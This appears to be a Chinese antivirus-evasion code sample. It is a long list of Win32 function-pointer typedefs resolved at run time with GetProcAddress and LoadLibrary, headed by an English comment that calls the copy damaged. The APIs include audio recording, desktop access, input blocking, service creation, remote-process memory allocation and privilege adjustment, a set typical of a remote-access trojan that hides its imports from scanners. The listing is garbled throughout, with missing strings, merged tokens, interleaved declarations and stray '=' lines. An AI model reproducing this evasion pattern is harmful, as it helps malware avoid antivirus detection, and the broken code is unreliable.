源码免杀动态调用例子
杀毒查杀的API函数调用例子:
/*
 * Run-time API resolution listing.
 *
 * This copy was damaged in extraction: whitespace between tokens is gone,
 * the string arguments after each "LoadLibrary(\" are missing, some
 * declarations are interleaved, and lines holding only "=" are residue.
 * It does not compile as shown.
 *
 * Pattern repeated for every entry:
 *   1. a typedef for a function pointer whose signature mirrors one
 *      Win32 API (SAL annotations such as __in/__out are kept);
 *   2. a pointer variable set from
 *      (Type)GetProcAddress(LoadLibrary(<module>), <export name>).
 *
 * Review notes (defensive reading):
 *   - The APIs are looked up by name at run time rather than linked
 *     through an import library, so presumably they do not show up in
 *     the binary's import table; triage that reads only the import table
 *     will miss them. The LoadLibrary/GetProcAddress calls themselves,
 *     and the name strings they need, remain observable.
 *   - No visible line checks the result of LoadLibrary or GetProcAddress;
 *     a failed lookup leaves a NULL function pointer.
 *   - InternetOpenUrlAT and SHGetSpecialFolderPathT are each declared
 *     twice, and VirtualFreeT is used without a visible typedef.
 *   - Only the lookups are shown; how the pointers are later called is
 *     not part of this listing.
 */
typedefUINT(WINAPI*GetSystemDirectoryAT)(
__out_ecount_part_opt(uSize,return+1)LPSTRlpBuffer,__inUINTuSize);
GetSystemDirectoryAT
typedefBOOL(WINAPI*HeapFreeT)(
__inoutHANDLEhHeap,__inDWORDdwFlags,
__derefLPVOIDlpMem);
HeapFreeTpHeapFree=(HeapFreeT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*ReleaseMutexT)(
__inHANDLEhMutex);
ReleaseMutexTpReleaseMutex
(ReleaseMutexT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*VirtualProtectT)(
__inLPVOIDlpAddress,__inSIZE_TdwSize,
__inDWORDflNewProtect,__outPDWORDlpflOldProtect);VirtualProtectT
pVirtualProtect
=
(VirtualProtectT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*GetModuleFileNameAT)(
__in_optHMODULEhModule,
__out_ecount_part(nSize,return+1)LPCHlpFilename,__inDWORDnSize
pGetSystemDirectoryA=
(GetSystemDirectoryAT)GetProcAddress(LoadLibrary(\
=
);
GetModuleFileNameATpGetModuleFileNameA=(GetModuleFileNameAT)GetProcAddress(LoadLibrary(\WINAPI
typedefBOOL(WINAPI*CopyFileAT)(
__inLPCSTRlpExistingFileName,__inLPCSTRlpNewFileName,__inBOOLbFailIfExists);
CopyFileATpCopyFileA(CopyFileAT)GetProcAddress(LoadLibrary(\
typedefVOID(WINAPI*LeaveCriticalSectionT)(
__inoutLPCRITICAL_SECTIONlpCriticalSection);
LeaveCriticalSectionTpLeaveCriticalSection(LeaveCriticalSectionT)GetProcAddress(LoadLibrary(\
typedefSC_HANDLE(WINAPI*OpenSCManagerAT)(
__in_optLPCSTRlpMachineName,__in_optLPCSTRlpDatabaseName,__inDWORDdwDesiredAccess);
OpenSCManagerAT
pOpenSCManagerA
(OpenSCManagerAT)GetProcAddress(LoadLibrary(\
/* AdjustTokenPrivileges enables or disables privileges in an access token. */
typedefBOOL(WINAPI*AdjustTokenPrivilegesT)(
__inHANDLETokenHandle,
=
==
__inBOOLDisableAllPrivileges,
__in_optPTOKEN_PRIVILEGESNewState,__inDWORDBufferLength,__out_bcount_part_opt(BufferLength,*ReturnLength)PreviousState,
__out_optPDWORDReturnLength);
AdjustTokenPrivilegesTpAdjustTokenPrivileges=(AdjustTokenPrivilegesT)GetProcAddress(LoadLibrary(\\PTOKEN_PRIVILEGES
;
typedefBOOL(WINAPI*SetFileAttributesAT)(
__inLPCSTRlpFileName,__inDWORDdwFileAttributes);
SetFileAttributesATpSetFileAttributesA(SetFileAttributesAT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*GetTempPathAT)(
__inDWORDnBufferLength,
__out_ecount_part(nBufferLength,return+1)LPSTRlpBuffer);
GetTempPathATpGetTempPathA(GetTempPathAT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*InternetCloseHandleT)(
__inHINTERNEThInternet);
InternetCloseHandleTpInternetCloseHandle(InternetCloseHandleT)GetProcAddress(LoadLibrary(\
/* First of two InternetOpenUrlAT declarations; this one has a malformed return type/calling convention. */
typedefINTERNETAPI_(HINTERNET*InternetOpenUrlAT)(
__inHINTERNEThInternet,__inLPCSTRlpszUrl,
__in_ecount_opt(dwHeadersLength)LPCSTRlpszHeaders,
=
=
=
__inDWORDdwHeadersLength,__inDWORDdwFlags,
__in_optDWORD_PTRdwContext);
InternetOpenUrlATpInternetOpenUrlA(InternetOpenUrlAT)GetProcAddress(LoadLibrary(\
typedefHINTERNET(WINAPI*InternetOpenUrlAT)(
__inHINTERNEThInternet,
__inLPCSTRlpszUrl,
__in_ecount_opt(dwHeadersLength)LPCSTRlpszHeaders,__inDWORDdwHeadersLength,__inDWORDdwFlags,
__in_optDWORD_PTRdwContext);
InternetOpenUrlATpInternetOpenUrlA(InternetOpenUrlAT)GetProcAddress(LoadLibrary(\
typedefLRESULT(WINAPI*CallNextHookExT)(
__in_optHHOOKhhk,__inintnCode,
__inWPARAMwParam,__inLPARAMlParam);CallNextHookExT
pCallNextHookEx
(CallNextHookExT)GetProcAddress(LoadLibrary(\
/* BlockInput blocks or unblocks keyboard and mouse input events. */
typedefBOOL(WINAPI*BlockInputT)(
BOOLfBlockIt);
BlockInputTpBlockInput
(BlockInputT)GetProcAddress(LoadLibrary(\
typedefSERVICE_STATUS_HANDLE(WINAPI*RegisterServiceCtrlHandlerAT)(
__inLPCSTRlpServiceName,__in__callback
LPHANDLER_FUNCTIONlpHandlerProc);
=
=
==
RegisterServiceCtrlHandlerATpRegisterServiceCtrlHandlerA=
(RegisterServiceCtrlHandlerAT)GetProcAddress(LoadLibrary(\rlHandlerA\
typedefBOOL(WINAPI*PostMessageAT)(
__in_optHWNDhWnd,__inUINTMsg,
__inWPARAMwParam,__inLPARAMlParam);
PostMessageATpPostMessageA(PostMessageAT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*WaitForSingleObjectT)(
__inHANDLEhHandle,
__inDWORDdwMilliseconds);
WaitForSingleObjectT
pWaitForSingleObject
=
(WaitForSingleObjectT)GetProcAddress(LoadLibrary(\
typedefHANDLE(WINAPI*CreateToolhelp32SnapshotT)(
DWORDdwFlags,
DWORDth32ProcessID);
CreateToolhelp32SnapshotTpCreateToolhelp32Snapshot=(CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(\apshot\
typedefBOOL(WINAPI*SetThreadDesktopT)(
__inHDESKhDesktop);SetThreadDesktopT
=
pSetThreadDesktop=
(SetThreadDesktopT)GetProcAddress(LoadLibrary(\
);
VirtualFreeTpVirtualFree
(VirtualFreeT)GetProcAddress(LoadLibrary(\
typedef__bcount(dwSize)LPVOID(WINAPI
*VirtualAllocT)(
__in_optLPVOIDlpAddress,__inSIZE_TdwSize,
__inDWORDflAllocationType,__inDWORDflProtect);VirtualAllocT
pVirtualAlloc
==
(VirtualAllocT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*SHGetSpecialFolderPathT)(HWNDhwnd,LPSTRpszPath,intcsidl,BOOLfCreate);
SHGetSpecialFolderPathTpSHGetSpecialFolderPath=(SHGetSpecialFolderPathT)GetProcAddress(LoadLibrary(\erPath\
/* Variant of the same lookup that keeps the module handle in mHodule and passes it to GetProcAddress. */
HMODULEmHodule=LoadLibrary(\
typedefBOOL(WINAPI*SHGetSpecialFolderPathT)(HWNDhwnd,LPSTRpszPath,int
csidl,BOOLfCreate);SHGetSpecialFolderPathT
pSHGetSpecialFolderPath=(SHGetSpecialFolderPathT)GetProcAddress(mHodule,\ialFolderPathA\
typedefBOOL(WINAPI*SHGetSpecialFolderPathAT)(HWNDhwnd,LPSTRpszPath,intcsidl,BOOLfCreate);
SHGetSpecialFolderPathATpSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary(\ialFolderPathA\
typedefHGDIOBJ(WINAPI*GetStockObjectT)(__ininti);
GetStockObjectTpGetStockObject(GetStockObjectT)GetProcAddress(LoadLibrary(\
typedefint(WINAPIV*wsprintfAT)(
__outLPSTR,
__in__format_stringLPCSTR,...);wsprintfAT
pwsprintfA
(wsprintfAT)GetProcAddress(LoadLibrary(\
typedef__out
HANDLE(WINAPI*CreateEventAT)
(
__in_optLPSECURITY_ATTRIBUTESlpEventAttributes,__inBOOLbManualReset,__inBOOLbInitialState,__in_optLPCSTRlpName
);CreateEventATpCreateEventA(CreateEventAT)GetProcAddress(LoadLibrary(\
typedef__out
LPSTR(WINAPI*lstrcatAT)(
__inoutLPSTRlpString1,__inLPCSTRlpString2);lstrcatATplstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*SetFilePointerT)(
__inHANDLEhFile,
__inLONGlDistanceToMove,__in_optPLONGlpDistanceToMoveHigh,__inDWORDdwMoveMethod);SetFilePointerT
pSetFilePointer
=
=
=
=
(SetFilePointerT)GetProcAddress(LoadLibrary(\
typedefDWORD_PTR(WINAPI*SHGetFileInfoAT)
(LPCSTRpszPath,DWORDdwFileAttributes,SHFILEINFOA*psfi,UINTcbFileInfo,UINTuFlags);
SHGetFileInfoAT
pSHGetFileInfoA
=
(SHGetFileInfoAT)GetProcAddress(LoadLibrary(\
typedefBOOL(VFWAPI*ICSeqCompressFrameStartT)(
INPCOMPVARSpc,INLPBITMAPINFOlpbiIn);
ICSeqCompressFrameStartTpICSeqCompressFrameStart=(ICSeqCompressFrameStartT)GetProcAddress(LoadLibrary(\FrameStart\
typedefLPVOID(VFWAPI*ICSeqCompressFrameT)(
INPCOMPVARSpc,INUINTuiFlags,INLPVOIDlpBits,OUTBOOLFAR*pfKey,
INOUTLONGFAR*plSize);
ICSeqCompressFrameTpICSeqCompressFrame=(ICSeqCompressFrameT)GetProcAddress(LoadLibrary(\\
typedefLRESULT(VFWAPI*ICSendMessageT)(
INHIChic,
INUINTmsg,
INDWORD_PTRdw1,INDWORD_PTRdw2);
ICSendMessageT
/* The ICOpenT typedef and the pICSendMessage assignment are interleaved in this copy. */
typedefHIC(VFWAPI*ICOpenT)(
INDWORDfccType,
pICSendMessage=
(ICSendMessageT)GetProcAddress(LoadLibrary(\
INDWORDfccHandler,
INUINTwMode);
ICOpenTpICOpen=(ICOpenT)GetProcAddress(LoadLibrary(\
typedefLRESULT(VFWAPI*ICCloseT)(
INHIChic);
ICCloseTpICClose=(ICCloseT)GetProcAddress(LoadLibrary(\
typedefvoid(VFWAPI*ICCompressorFreeT)(
INPCOMPVARSpc);
ICCompressorFreeTpICCompressorFree
(ICCompressorFreeT)GetProcAddress(LoadLibrary(\
typedefvoid(VFWAPI*ICSeqCompressFrameEndT)(
INPCOMPVARSpc);
ICSeqCompressFrameEndT
=
pICSeqCompressFrameEnd=
(ICSeqCompressFrameEndT)GetProcAddress(LoadLibrary(\ameEnd\
typedef__out
HANDLE(WINAPI*GetProcessHeapT)(VOID);
GetProcessHeapTpGetProcessHeap
(GetProcessHeapT)GetProcAddress(LoadLibrary(\
typedefSIZE_T(WINAPI*LocalSizeT)(
__inHLOCALhMem);
LocalSizeTpLocalSize
(LocalSizeT)GetProcAddress(LoadLibrary(\
=
=
typedefBOOL(WINAPI*CloseDesktopT)
(
__inHDESKhDesktop);CloseDesktopTpCloseDesktop
(CloseDesktopT)GetProcAddress(LoadLibrary(\
typedefHDESK(WINAPI*OpenDesktopAT)(
__inLPCSTRlpszDesktop,__inDWORDdwFlags,__inBOOLfInherit,
__inACCESS_MASKdwDesiredAccess);OpenDesktopATpOpenDesktopA
(OpenDesktopAT)GetProcAddress(LoadLibrary(\
typedefint(WINAPI*SHCreateDirectoryExAT)(HWNDhwnd,LPCSTRpszPath,SECURITY_ATTRIBUTES*psa);SHCreateDirectoryExAT
pSHCreateDirectoryExA
=
(SHCreateDirectoryExAT)GetProcAddress(LoadLibrary(\A\
typedefHINSTANCE(WINAPI*ShellExecuteAT)
(HWNDhwnd,LPCSTRlpOperation,LPCSTRlpFile,LPCSTRlpParameters,LPCSTRlpDirectory,INTnShowCmd);
ShellExecuteATpShellExecuteA(ShellExecuteAT)GetProcAddress(LoadLibrary(\
typedefMMRESULT(WINAPI*waveOutUnprepareHeaderT)
(INHWAVEOUThwo,INOUTLPWAVEHDRpwh,INUINTcbwh);waveOutUnprepareHeaderTpwaveOutUnprepareHeader
===
=
(waveOutUnprepareHeaderT)GetProcAddress(LoadLibrary(\ader\
typedefMMRESULT(WINAPI*waveInUnprepareHeaderT)(INHWAVEINhwi,INOUTLPWAVEHDRpwh,UINTcbwh);waveInUnprepareHeaderT
pwaveInUnprepareHeader
=
(waveInUnprepareHeaderT)GetProcAddress(LoadLibrary(\r\
typedefMMRESULT(WINAPI*waveInAddBufferT)
(INHWAVEINhwi,INOUTLPWAVEHDRpwh,INUINTcbwh);
waveInAddBufferTpwaveInAddBuffer
(waveInAddBufferT)GetProcAddress(LoadLibrary(\
typedefMMRESULT(WINAPI*waveInStartT)(INHWAVEINhwi);
waveInStartT
pwaveInStart
=
(waveInStartT)GetProcAddress(LoadLibrary(\
typedefMMRESULT(WINAPI*waveInOpenT)(OUTLPHWAVEINphwi,INUINTuDeviceID,
INLPCWAVEFORMATEXpwfx,INDWORD_PTRdwCallback,INDWORD_PTRdwInstance,INDWORDfdwOpen);
waveInOpenTpwaveInOpen
(waveInOpenT)GetProcAddress(LoadLibrary(\
typedef__out
HANDLE(WINAPI*OpenProcessT)(
__inDWORDdwDesiredAccess,__inBOOLbInheritHandle,__inDWORDdwProcessId);
OpenProcessT
pOpenProcess
===
(OpenProcessT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*GetCurrentThreadIdT)(
VOID);
GetCurrentThreadIdT
pGetCurrentThreadId
=
(GetCurrentThreadIdT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*GetCursorPosT)(
__outLPPOINTlpPoint);GetCursorPosT
pGetCursorPos=
(GetCursorPosT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*SetProcessWindowStationT)(
__inHWINSTAhWinSta);
SetProcessWindowStationT
pSetProcessWindowStation
=
(SetProcessWindowStationT)GetProcAddress(LoadLibrary(\ation\
/* VirtualAllocEx takes a process handle (hProcess) and allocates memory in that process's address space. */
typedef__bcount(dwSize)
LPVOID(WINAPI*VirtualAllocExT)(
__inHANDLEhProcess,__in_optLPVOIDlpAddress,__inSIZE_TdwSize,
__inDWORDflAllocationType,__inDWORDflProtect);
VirtualAllocExT
pVirtualAllocEx
(VirtualAllocExT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*SHDeleteKeyT)(HKEY,LPCTSTR);SHDeleteKeyT
pSHDeleteKey
(SHDeleteKeyT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*SizeofResourceT)(
__in_optHMODULEhModule,__inHRSRChResInfo);
SizeofResourceTpSizeofResource(SizeofResourceT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*CloseHandleT)(
__inHANDLEhObject);
=
=
=
CloseHandleTpCloseHandle(CloseHandleT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*FindCloseT)(
__inoutHANDLEhFindFile);
FindCloseTpFindClose
(FindCloseT)GetProcAddress(LoadLibrary(\
/* CreateServiceA creates a service object in the service control manager database. */
typedefSC_HANDLE(WINAPI*CreateServiceAT)(
__inSC_HANDLEhSCManager,__inLPCSTRlpServiceName,__in_optLPCSTRlpDisplayName,__inDWORDdwDesiredAccess,__inDWORDdwServiceType,__inDWORDdwStartType,__inDWORDdwErrorControl,
__in_optLPCSTRlpBinaryPathName,
__in_optLPCSTRlpLoadOrderGroup,__out_optLPDWORDlpdwTagId,__in_optLPCSTRlpDependencies,__in_optLPCSTRlpServiceStartName,__in_optLPCSTRlpPassword);
CreateServiceAT
pCreateServiceA
(CreateServiceAT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*GetVolumeInformationAT)(
__in_optLPCSTRlpRootPathName,
__out_ecount_opt(nVolumeNameSize)LPSTRlpVolumeNameBuffer,__inDWORDnVolumeNameSize,
__out_optLPDWORDlpVolumeSerialNumber,
__out_optLPDWORDlpMaximumComponentLength,__out_optLPDWORDlpFileSystemFlags,
=
=
=
__out_ecount_opt(nFileSystemNameSize)LPSTRlpFileSystemNameBuffer,
__inDWORDnFileSystemNameSize);GetVolumeInformationATpGetVolumeInformationA=(GetVolumeInformationAT)GetProcAddress(LoadLibrary(\olumeInformationA\
typedefBOOL(WINAPI*CreateDirectoryAT)(
__inLPCSTRlpPathName,__in_optLPSECURITY_ATTRIBUTESlpSecurityAttributes);
CreateDirectoryAT
pCreateDirectoryA
(CreateDirectoryAT)GetProcAddress(LoadLibrary(\
typedef__out
HLOCAL(WINAPI*LocalReAllocT)(__inHLOCALhMem,__inSIZE_TuBytes,__inUINTuFlags
);
LocalReAllocTpLocalReAlloc
(LocalReAllocT)GetProcAddress(LoadLibrary(\
typedefHDESK(WINAPI*OpenInputDesktopT)(
__inDWORDdwFlags,
__inBOOLfInherit,
__inACCESS_MASKdwDesiredAccess);
OpenInputDesktopTpOpenInputDesktop
(OpenInputDesktopT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*AdjustTokenPrivilegesT)(
__inHANDLETokenHandle,__inBOOLDisableAllPrivileges,
__in_optPTOKEN_PRIVILEGESNewState,
=
=
=
__inDWORDBufferLength,__out_bcount_part_opt(BufferLength,PreviousState,